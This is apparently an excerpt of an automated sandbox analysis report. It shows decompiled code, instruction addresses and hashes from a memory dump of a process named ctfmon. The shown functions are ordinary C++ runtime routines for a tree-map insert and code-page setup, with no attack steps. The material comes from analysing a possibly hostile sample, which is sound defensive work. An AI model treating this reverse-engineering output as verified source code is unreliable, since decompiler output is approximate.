                                                0x00966a44
                                                0x00966a47
                                                0x00966a4c
                                                0x00966a4f
                                                0x00966a5c
                                                0x00966a5f
                                                0x00966a62
                                                0x00966a6f
                                                0x00966a71
                                                0x00966a64
                                                0x00966a64
                                                0x00966a67
                                                0x00966a67
                                                0x00966a51
                                                0x00966a51
                                                0x00966a54
                                                0x00966a54
                                                0x00966af4
                                                0x00966af4
                                                0x00966af4
                                                0x00966a08
                                                0x00966af7
                                                0x00966af7
                                                0x00966afa
                                                0x00966afa
                                                0x009669f5
                                                0x00966b0c
                                                0x00966b10
                                                0x00966b13
                                                0x00966b18
                                                0x00966964
                                                0x00966964
                                                0x00966964
                                                0x00966967
                                                0x00966967
                                                0x0096696d
                                                0x00966973
                                                0x00966973
                                                0x00966978
                                                0x0096697f
                                                0x0096698a
                                                0x00966b1b
                                                0x00966b1b
                                                0x00966b1e
                                                0x00966b21
                                                0x00966b26
                                                0x00966b29
                                                0x00966b2e
                                                0x00966b33
                                                0x00966b34
                                                0x00966b35
                                                0x00966b36
                                                0x00966b37
                                                0x00966b38
                                                0x00966b39
                                                0x00966b3a
                                                0x00966b3b
                                                0x00966b3c
                                                0x00966b3d
                                                0x00966b3e
                                                0x00966b3f
                                                0x00966b43
                                                0x00966b45
                                                0x00966b50
                                                0x00966b51
                                                0x00966b54
                                                0x00966b55
                                                0x00966b56
                                                0x00966b57
                                                0x00966b5e
                                                0x00966b62
                                                0x00966b68
                                                0x00966b6b
                                                0x00966b72
                                                0x00966b74
                                                0x00966b7a
                                                0x00966b7c
                                                0x00966b7f
                                                0x00966b82
                                                0x00966b85
                                                0x00966b8c
                                                0x00966b90
                                                0x00966b94
                                                0x00966b94
                                                0x00966b97
                                                0x00966b9a
                                                0x00966b9d
                                                0x00966b9f
                                                0x00966b9f
                                                0x00966ba5
                                                0x00966bab
                                                0x00966ba7
                                                0x00966ba7
                                                0x00966ba7
                                                0x00966bb2
                                                0x00966bb7
                                                0x00966bbc
                                                0x00966bc1
                                                0x00966bc3
                                                0x00966bc8
                                                0x00966bd1
                                                0x00966bd3
                                                0x00966bd3
                                                0x00966bd3
                                                0x00966bca
                                                0x00966bca
                                                0x00966bca
                                                0x00966bd6
                                                0x00966bd6
                                                0x00966bd8
                                                0x00966bdb
                                                0x00966be0
                                                0x00966be6
                                                0x00966be2
                                                0x00966be2
                                                0x00966be2
                                                0x00966be9
                                                0x00966bef
                                                0x00966bf2
                                                0x00966bf2
                                                0x00966bf8
                                                0x00966bfa
                                                0x00966bff
                                                0x00966c3f
                                                0x00966c3f
                                                0x00966c43
                                                0x00966c43
                                                0x00966c46
                                                0x00966c49
                                                0x00966c4c
                                                0x00966c4e
                                                0x00966c4e
                                                0x00966c50
                                                0x00966c54
                                                0x00966c57
                                                0x00966c59
                                                0x00966c59
                                                0x00966c5b
                                                0x00966c5f
                                                0x00966c61
                                                0x00966c65
                                                0x00966c6d
                                                0x00966c6f
                                                0x00966c71
                                                0x00966c74
                                                0x00966c76
                                                0x00966c7f
                                                0x00966c81
                                                0x00966c81
                                                0x00966c81
                                                0x00966c78
                                                0x00966c78
                                                0x00966c78
                                                0x00966c84
                                                0x00966c84
                                                0x00966c8b
                                                0x00966cd0
                                                0x00966cd3
                                                0x00966cd6
                                                0x00966cd9
                                                0x00966cdc
                                                0x00966cde
                                                0x00966ce2
                                                0x00966ce2
                                                0x00966ce7
                                                0x00966cee
                                                0x00966cf5
                                                0x00966cf9
                                                0x00966cfb
                                                0x00966cfb
                                                0x00966cfe
                                                0x00966d01
                                                0x00966d06
                                                0x00966d0c
                                                0x00966d0e
                                                0x00966d15
                                                0x00966d23
                                                0x00966c8d
                                                0x00966c8d
                                                0x00966c9b
                                                0x00966ca2
                                                0x00966ca5
                                                0x00966ca7
                                                0x00966cae
                                                0x00966cbc
                                                0x00966cbc
                                                0x00966c01
                                                0x00966c03
                                                0x00966c37
                                                0x00966c3c
                                                0x00000000
                                                0x00966c05
                                                0x00966c05
                                                0x00966c10
                                                0x00966c17
                                                0x00966c1a
                                                0x00966c1c
                                                0x00966c23
                                                0x00966c31
                                                0x00966c31
                                                0x00966c03
                                                0x00966bff

                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 00966B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Xinvalid_argumentstd::_
                                                • String ID: /LU5/$map/set<T> too long
                                                • API String ID: 909987262-3393314386
                                                • Opcode ID: 6fbb7ac744c8d37632ea553d727169f2b99aae55cad6063c552ab7762e497ec9
                                                • Instruction ID: 714a05bcbe0c6740a1768895071b7ceeea2c7b401693395bb788a073cafd538d
                                                • Opcode Fuzzy Hash: 6fbb7ac744c8d37632ea553d727169f2b99aae55cad6063c552ab7762e497ec9
                                                • Instruction Fuzzy Hash: D1C18870608241CFCB15CF18C584A2ABBE5FF45314F29C99AE8899B3A2D775EC81CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00968170 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 317COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E00968170(void* __ebx, void* __edx, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr* _a20) {
				intOrPtr* _v0;
				intOrPtr* _v4;
				intOrPtr _v20;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* __edi;
				void* __ebp;
				intOrPtr _t133;
				intOrPtr* _t135;
				intOrPtr _t136;
				intOrPtr* _t139;
				intOrPtr* _t140;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr* _t149;
				intOrPtr _t150;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr* _t163;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				intOrPtr _t179;
				intOrPtr* _t181;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t194;
				void* _t198;
				intOrPtr* _t199;
				intOrPtr _t200;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t209;
				void* _t210;
				intOrPtr* _t220;
				intOrPtr _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				char _t226;
				intOrPtr* _t228;
				intOrPtr* _t230;
				intOrPtr _t232;
				char* _t233;
				intOrPtr _t237;
				intOrPtr* _t239;
				char* _t241;
				intOrPtr* _t242;
				char _t243;
				void* _t249;
				signed int _t250;
				intOrPtr _t251;
				signed int _t264;

				_t198 = __ebx;
				_t133 =  *0x996a90;
				_t230 = _a20;
				if(_t133 < 0x5d1745c) {
					 *0x996a90 = _t133 + 1;
					_t135 = _a12;
					 *((intOrPtr*)(_t230 + 4)) = _t135;
					_t204 =  *0x996a8c;
					__eflags = _t135 - _t204;
					if(_t135 != _t204) {
						__eflags = _a8;
						if(_a8 == 0) {
							 *((intOrPtr*)(_t135 + 8)) = _t230;
							_t205 =  *0x996a8c;
							__eflags = _t135 -  *((intOrPtr*)(_t205 + 8));
							if(_t135 ==  *((intOrPtr*)(_t205 + 8))) {
								 *((intOrPtr*)(_t205 + 8)) = _t230;
							}
						} else {
							 *_t135 = _t230;
							_t208 =  *0x996a8c;
							__eflags = _t135 -  *_t208;
							if(_t135 ==  *_t208) {
								 *_t208 = _t230;
							}
						}
					} else {
						 *((intOrPtr*)(_t204 + 4)) = _t230;
						 *((intOrPtr*)( *0x996a8c)) = _t230;
						 *((intOrPtr*)( *0x996a8c + 8)) = _t230;
					}
					_t15 = _t230 + 4; // 0xc6088908
					_t136 =  *_t15;
					_t239 = _t230;
					__eflags =  *((char*)(_t136 + 0xc));
					if( *((char*)(_t136 + 0xc)) == 0) {
						do {
							_t17 = _t239 + 4; // 0xc6088908
							_t140 =  *_t17;
							_t223 =  *((intOrPtr*)(_t140 + 4));
							_t206 =  *_t223;
							__eflags = _t140 - _t206;
							if(_t140 != _t206) {
								__eflags =  *((char*)(_t206 + 0xc));
								if( *((char*)(_t206 + 0xc)) != 0) {
									__eflags = _t239 -  *_t140;
									if(_t239 ==  *_t140) {
										_t239 = _t140;
										E00968550(_t239);
									}
									_t51 = _t239 + 4; // 0xc6088908
									 *((char*)( *_t51 + 0xc)) = 1;
									_t53 = _t239 + 4; // 0xc6088908
									 *((char*)( *((intOrPtr*)( *_t53 + 4)) + 0xc)) = 0;
									_t56 = _t239 + 4; // 0xc6088908
									_t207 =  *((intOrPtr*)( *_t56 + 4));
									_t224 =  *((intOrPtr*)(_t207 + 8));
									 *((intOrPtr*)(_t207 + 8)) =  *_t224;
									_t146 =  *_t224;
									__eflags =  *((char*)(_t146 + 0xd));
									if( *((char*)(_t146 + 0xd)) == 0) {
										 *((intOrPtr*)(_t146 + 4)) = _t207;
									}
									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
									_t148 =  *0x996a8c;
									__eflags = _t207 -  *((intOrPtr*)(_t148 + 4));
									if(_t207 !=  *((intOrPtr*)(_t148 + 4))) {
										_t149 =  *((intOrPtr*)(_t207 + 4));
										__eflags = _t207 -  *_t149;
										if(_t207 !=  *_t149) {
											 *((intOrPtr*)(_t149 + 8)) = _t224;
										} else {
											 *_t149 = _t224;
										}
									} else {
										 *((intOrPtr*)(_t148 + 4)) = _t224;
									}
									 *_t224 = _t207;
									goto L36;
								} else {
									goto L25;
								}
							} else {
								_t206 =  *((intOrPtr*)(_t223 + 8));
								__eflags =  *((char*)(_t206 + 0xc));
								if( *((char*)(_t206 + 0xc)) == 0) {
									L25:
									 *((char*)(_t140 + 0xc)) = 1;
									 *((char*)(_t206 + 0xc)) = 1;
									_t46 = _t239 + 4; // 0xc6088908
									 *((char*)( *((intOrPtr*)( *_t46 + 4)) + 0xc)) = 0;
									_t49 = _t239 + 4; // 0xc6088908
									_t239 =  *((intOrPtr*)( *_t49 + 4));
								} else {
									__eflags = _t239 -  *((intOrPtr*)(_t140 + 8));
									if(_t239 ==  *((intOrPtr*)(_t140 + 8))) {
										_t239 = _t140;
										E009685B0(_t239);
									}
									 *((char*)( *((intOrPtr*)(_t239 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4)) + 0xc)) = 0;
									_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4));
									_t224 =  *_t207;
									 *_t207 =  *((intOrPtr*)(_t224 + 8));
									_t160 =  *((intOrPtr*)(_t224 + 8));
									__eflags =  *((char*)(_t160 + 0xd));
									if( *((char*)(_t160 + 0xd)) == 0) {
										 *((intOrPtr*)(_t160 + 4)) = _t207;
									}
									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
									_t162 =  *0x996a8c;
									__eflags = _t207 -  *((intOrPtr*)(_t162 + 4));
									if(_t207 !=  *((intOrPtr*)(_t162 + 4))) {
										_t163 =  *((intOrPtr*)(_t207 + 4));
										__eflags = _t207 -  *((intOrPtr*)(_t163 + 8));
										if(_t207 !=  *((intOrPtr*)(_t163 + 8))) {
											 *_t163 = _t224;
											 *((intOrPtr*)(_t224 + 8)) = _t207;
										} else {
											 *((intOrPtr*)(_t163 + 8)) = _t224;
											 *((intOrPtr*)(_t224 + 8)) = _t207;
										}
									} else {
										 *((intOrPtr*)(_t162 + 4)) = _t224;
										 *((intOrPtr*)(_t224 + 8)) = _t207;
									}
									L36:
									 *((intOrPtr*)(_t207 + 4)) = _t224;
								}
							}
							_t69 = _t239 + 4; // 0xc6088908
							_t150 =  *_t69;
							__eflags =  *((char*)(_t150 + 0xc));
						} while ( *((char*)(_t150 + 0xc)) == 0);
					}
					 *((char*)( *((intOrPtr*)( *0x996a8c + 4)) + 0xc)) = 1;
					_t139 = _a4;
					 *_t139 = _t230;
					return _t139;
				} else {
					_t2 = _t230 + 0x24; // 0x6affffe3
					_t167 =  *_t2;
					_t3 = _t230 + 0x10; // 0x9684d0
					_t241 = _t3;
					if( *_t2 >= 0x10) {
						E00965CF0(__ebx, __edx, _t230,  *_t241, _t167 + 1);
					}
					 *((intOrPtr*)(_t241 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t241 + 0x10)) = 0;
					if( *((intOrPtr*)(_t241 + 0x14)) >= 0x10) {
						_t241 =  *_t241;
					}
					 *_t241 = 0;
					L00970D45(_t230);
					_t250 = _t249 + 4;
					_push("map/set<T> too long");
					E009718DF();
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0xffffffff);
					_push(E009846D0);
					_push( *[fs:0x0]);
					_t251 = _t250 - 0xc;
					_push(_t198);
					_push(_t241);
					_push(_t230);
					_t171 =  *0x98f008; // 0x35554c2f
					_push(_t171 ^ _t250);
					 *[fs:0x0] =  &_v32;
					_v36 = _t251;
					_v24 = 0;
					_t174 = 1;
					_t225 =  *0x996a8c;
					_t209 = _t225;
					_t199 = _v4;
					_v40 = _t209;
					_v44 = 1;
					_t242 =  *((intOrPtr*)(_t225 + 4));
					if( *((char*)(_t242 + 0xd)) == 0) {
						do {
							_t83 = _t242 + 0x10; // 0x10
							_t228 = _t83;
							_t237 =  *((intOrPtr*)(_t228 + 0x10));
							_v28 = _t242;
							if( *((intOrPtr*)(_t242 + 0x24)) >= 0x10) {
								_t228 =  *_t228;
							}
							if( *((intOrPtr*)(_t199 + 0x14)) < 0x10) {
								_t220 = _t199;
							} else {
								_t220 =  *_t199;
							}
							_t193 =  <  ?  *((void*)(_t199 + 0x10)) : _t237;
							_t194 = E009651A0(_t220, _t228,  <  ?  *((void*)(_t199 + 0x10)) : _t237);
							_t251 = _t251 + 4;
							if(_t194 == 0) {
								_t221 =  *((intOrPtr*)(_t199 + 0x10));
								if(_t221 >= _t237) {
									__eflags = _t221 - _t237;
									_t91 = _t221 != _t237;
									__eflags = _t91;
									_t194 = 0 | _t91;
								} else {
									_t194 = _t194 | 0xffffffff;
								}
								_t264 = _t194;
							}
							_t174 = _t194 & 0xffffff00 | _t264 < 0x00000000;
							_v32 = _t174;
							if(_t174 == 0) {
								_t242 =  *((intOrPtr*)(_t242 + 8));
							} else {
								_t242 =  *_t242;
							}
						} while ( *((char*)(_t242 + 0xd)) == 0);
						_t209 = _v28;
						_t225 =  *0x996a8c;
					}
					_t243 = _t209;
					_a8 = _t243;
					if(_t174 == 0) {
						L62:
						__eflags =  *((intOrPtr*)(_t199 + 0x14)) - 0x10;
						_t210 = _t243 + 0x10;
						_t226 =  *((intOrPtr*)(_t199 + 0x10));
						_a8 = _t226;
						if( *((intOrPtr*)(_t199 + 0x14)) >= 0x10) {
							_t199 =  *_t199;
						}
						__eflags =  *((intOrPtr*)(_t210 + 0x14)) - 0x10;
						_t232 =  *((intOrPtr*)(_t210 + 0x10));
						if( *((intOrPtr*)(_t210 + 0x14)) >= 0x10) {
							_t210 =  *_t210;
						}
						__eflags = _t232 - _t226;
						_t227 = _t199;
						_t176 =  <  ? _t232 : _t226;
						_t177 = E009651A0(_t210, _t199,  <  ? _t232 : _t226);
						__eflags = _t177;
						if(__eflags == 0) {
							_t210 = _a8;
							__eflags = _t232 - _t210;
							if(_t232 >= _t210) {
								__eflags = _t232 - _t210;
								_t114 = _t232 != _t210;
								__eflags = _t114;
								_t177 = 0 | _t114;
							} else {
								_t177 = _t177 | 0xffffffff;
							}
							__eflags = _t177;
						}
						if(__eflags == 0) {
							_t200 = _a12;
							_t179 =  *((intOrPtr*)(_t200 + 0x24));
							_t233 = _t200 + 0x10;
							__eflags = _t179 - 0x10;
							if(_t179 >= 0x10) {
								__eflags = _t179 + 1;
								E00965CF0(_t200, _t227, _t233,  *_t233, _t179 + 1);
							}
							 *((intOrPtr*)(_t233 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t233 + 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t233 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t233 + 0x14)) >= 0x10) {
								_t233 =  *_t233;
							}
							 *_t233 = 0;
							L00970D45(_t200);
							_t181 = _v0;
							 *_t181 = _t243;
							 *((char*)(_t181 + 4)) = 0;
							 *[fs:0x0] = _v20;
							return _t181;
						} else {
							_push(_a12);
							_t185 = E00968170(_t199, _t227,  &_a8, _v32, _v28, _t210);
							_t186 = _v0;
							 *_t186 =  *_t185;
							 *((char*)(_t186 + 4)) = 1;
							 *[fs:0x0] = _v20;
							return _t186;
						}
					} else {
						if(_t209 !=  *_t225) {
							E009668F0( &_a8);
							_t243 = _a8;
							goto L62;
						} else {
							_push(_a12);
							_t190 = E00968170(_t199, _t225,  &_a8, 1, _t209, _t209);
							_t191 = _v0;
							 *_t191 =  *_t190;
							 *((char*)(_t191 + 4)) = 1;
							 *[fs:0x0] = _v20;
							return _t191;
						}
					}
				}
			}

































































                                                0x00968170
                                                0x00968173
                                                0x0096817a
                                                0x00968182
                                                0x009681b6
                                                0x009681bb
                                                0x009681be
                                                0x009681c1
                                                0x009681c7
                                                0x009681c9
                                                0x009681df
                                                0x009681e3
                                                0x009681f5
                                                0x009681f8
                                                0x009681fe
                                                0x00968201
                                                0x00968203
                                                0x00968203
                                                0x009681e5
                                                0x009681e5
                                                0x009681e7
                                                0x009681ed
                                                0x009681ef
                                                0x009681f1
                                                0x009681f1
                                                0x009681ef
                                                0x009681cb
                                                0x009681cb
                                                0x009681d3
                                                0x009681da
                                                0x009681da
                                                0x00968206
                                                0x00968206
                                                0x00968209
                                                0x0096820b
                                                0x0096820f
                                                0x00968215
                                                0x00968215
                                                0x00968215
                                                0x00968218
                                                0x0096821b
                                                0x0096821d
                                                0x0096821f
                                                0x00968299
                                                0x0096829d
                                                0x009682b9
                                                0x009682bb
                                                0x009682bd
                                                0x009682c0
                                                0x009682c0
                                                0x009682c5
                                                0x009682c8
                                                0x009682cc
                                                0x009682d2
                                                0x009682d6
                                                0x009682d9
                                                0x009682dc
                                                0x009682e1
                                                0x009682e4
                                                0x009682e6
                                                0x009682ea
                                                0x009682ec
                                                0x009682ec
                                                0x009682f2
                                                0x009682f5
                                                0x009682fa
                                                0x009682fd
                                                0x00968304
                                                0x00968307
                                                0x00968309
                                                0x0096830f
                                                0x0096830b
                                                0x0096830b
                                                0x0096830b
                                                0x009682ff
                                                0x009682ff
                                                0x009682ff
                                                0x00968312
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00968221
                                                0x00968221
                                                0x00968224
                                                0x00968228
                                                0x0096829f
                                                0x0096829f
                                                0x009682a3
                                                0x009682a7
                                                0x009682ad
                                                0x009682b1
                                                0x009682b4
                                                0x0096822a
                                                0x0096822a
                                                0x0096822d
                                                0x0096822f
                                                0x00968232
                                                0x00968232
                                                0x0096823a
                                                0x00968244
                                                0x0096824b
                                                0x0096824e
                                                0x00968253
                                                0x00968255
                                                0x00968258
                                                0x0096825c
                                                0x0096825e
                                                0x0096825e
                                                0x00968264
                                                0x00968267
                                                0x0096826c
                                                0x0096826f
                                                0x0096827c
                                                0x0096827f
                                                0x00968282
                                                0x0096828f
                                                0x00968291
                                                0x00968284
                                                0x00968284
                                                0x00968287
                                                0x00968287
                                                0x00968271
                                                0x00968271
                                                0x00968274
                                                0x00968274
                                                0x00968314
                                                0x00968314
                                                0x00968314
                                                0x00968228
                                                0x00968317
                                                0x00968317
                                                0x0096831a
                                                0x0096831a
                                                0x00968215
                                                0x0096832c
                                                0x00968330
                                                0x00968333
                                                0x00968338
                                                0x00968184
                                                0x00968184
                                                0x00968184
                                                0x00968187
                                                0x00968187
                                                0x0096818d
                                                0x00968193
                                                0x00968193
                                                0x00968198
                                                0x0096819f
                                                0x009681aa
                                                0x0096833b
                                                0x0096833b
                                                0x0096833e
                                                0x00968341
                                                0x00968346
                                                0x00968349
                                                0x0096834e
                                                0x00968353
                                                0x00968354
                                                0x00968355
                                                0x00968356
                                                0x00968357
                                                0x00968358
                                                0x00968359
                                                0x0096835a
                                                0x0096835b
                                                0x0096835c
                                                0x0096835d
                                                0x0096835e
                                                0x0096835f
                                                0x00968363
                                                0x00968365
                                                0x00968370
                                                0x00968371
                                                0x00968374
                                                0x00968375
                                                0x00968376
                                                0x00968377
                                                0x0096837e
                                                0x00968382
                                                0x00968388
                                                0x0096838b
                                                0x00968392
                                                0x00968394
                                                0x0096839a
                                                0x0096839c
                                                0x0096839f
                                                0x009683a2
                                                0x009683a5
                                                0x009683ac
                                                0x009683b0
                                                0x009683b4
                                                0x009683b4
                                                0x009683b7
                                                0x009683ba
                                                0x009683bd
                                                0x009683bf
                                                0x009683bf
                                                0x009683c5
                                                0x009683cb
                                                0x009683c7
                                                0x009683c7
                                                0x009683c7
                                                0x009683d2
                                                0x009683d7
                                                0x009683dc
                                                0x009683e1
                                                0x009683e3
                                                0x009683e8
                                                0x009683f1
                                                0x009683f3
                                                0x009683f3
                                                0x009683f3
                                                0x009683ea
                                                0x009683ea
                                                0x009683ea
                                                0x009683f6
                                                0x009683f6
                                                0x009683f8
                                                0x009683fb
                                                0x00968400
                                                0x00968406
                                                0x00968402
                                                0x00968402
                                                0x00968402
                                                0x00968409
                                                0x0096840f
                                                0x00968412
                                                0x00968412
                                                0x00968418
                                                0x0096841a
                                                0x0096841f
                                                0x0096845f
                                                0x0096845f
                                                0x00968463
                                                0x00968466
                                                0x00968469
                                                0x0096846c
                                                0x0096846e
                                                0x0096846e
                                                0x00968470
                                                0x00968474
                                                0x00968477
                                                0x00968479
                                                0x00968479
                                                0x0096847b
                                                0x0096847f
                                                0x00968481
                                                0x00968485
                                                0x0096848d
                                                0x0096848f
                                                0x00968491
                                                0x00968494
                                                0x00968496
                                                0x0096849f
                                                0x009684a1
                                                0x009684a1
                                                0x009684a1
                                                0x00968498
                                                0x00968498
                                                0x00968498
                                                0x009684a4
                                                0x009684a4
                                                0x009684ab
                                                0x009684f0
                                                0x009684f3
                                                0x009684f6
                                                0x009684f9
                                                0x009684fc
                                                0x009684fe
                                                0x00968502
                                                0x00968502
                                                0x00968507
                                                0x0096850e
                                                0x00968515
                                                0x00968519
                                                0x0096851b
                                                0x0096851b
                                                0x0096851e
                                                0x00968521
                                                0x00968526
                                                0x0096852c
                                                0x0096852e
                                                0x00968535
                                                0x00968543
                                                0x009684ad
                                                0x009684ad
                                                0x009684bb
                                                0x009684c2
                                                0x009684c5
                                                0x009684c7
                                                0x009684ce
                                                0x009684dc
                                                0x009684dc
                                                0x00968421
                                                0x00968423
                                                0x00968457
                                                0x0096845c
                                                0x00000000
                                                0x00968425
                                                0x00968425
                                                0x00968430
                                                0x00968437
                                                0x0096843a
                                                0x0096843c
                                                0x00968443
                                                0x00968451
                                                0x00968451
                                                0x00968423
                                                0x0096841f

                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 0096834E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Xinvalid_argumentstd::_
                                                • String ID: /LU5/$map/set<T> too long
                                                • API String ID: 909987262-3393314386
                                                • Opcode ID: f283189b15b9a789867c6b611c21c3495783787a767055e677e5adf6630c889f
                                                • Instruction ID: 66e072e2734fae53bd6fa1701938a20bfaadef96d7bca95c9b37e00466c29eab
                                                • Opcode Fuzzy Hash: f283189b15b9a789867c6b611c21c3495783787a767055e677e5adf6630c889f
                                                • Instruction Fuzzy Hash: 81C1AC70604241CFDB15CF18C484A66BBE5FF45314F29CA99E85A9B3A2DB75EC81CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097ACD1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0097ACD1(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t97;
				signed int _t98;

				_t48 =  *0x98f008; // 0x35554c2f
				_v8 = _t48 ^ _t98;
				_t97 = _a8;
				_t78 = E0097A8A4(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x990628)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x990628)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x9967ec - _t94;
											if( *0x9967ec == _t94) {
												goto L23;
											} else {
												E0097A917(_t97);
												goto L37;
											}
										} else {
											E00973440(_t94, _t97 + 0x18, _t94, 0x101);
											 *(_t97 + 4) = _t78;
											 *(_t97 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t97 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t97 + _t89 + 0x19) =  *(_t97 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t97 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t97 + 0x21c) = E0097A866( *(_t97 + 4));
												 *(_t97 + 8) = _t78;
											}
											_t95 = _t97 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0097A97C(_t78, _t91, _t95, _t97);
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00973440(_t94, _t97 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x990638;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x990624; // 0x8040201
										 *(_t97 + _t92 + 0x19) =  *(_t97 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t97 + 4) = _t78;
					 *(_t97 + 8) = 1;
					 *(_t97 + 0x21c) = E0097A866(_t78);
					_t83 = _t97 + 0xc;
					_t91 = _v36 + 0x99062c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E0097A917(_t97);
				}
				L39:
				return E00970A5D(_v8 ^ _t98, _t97);
			}































                                                0x0097acd9
                                                0x0097ace0
                                                0x0097ace8
                                                0x0097acf0
                                                0x0097acf5
                                                0x0097ad06
                                                0x0097ad06
                                                0x0097ad08
                                                0x0097ad0a
                                                0x0097ad0c
                                                0x0097ad0f
                                                0x0097ad0f
                                                0x0097ad15
                                                0x00000000
                                                0x00000000
                                                0x0097ad1b
                                                0x0097ad1c
                                                0x0097ad1f
                                                0x0097ad22
                                                0x0097ad27
                                                0x00000000
                                                0x0097ad29
                                                0x0097ad29
                                                0x0097ad2f
                                                0x0097adfd
                                                0x0097ad35
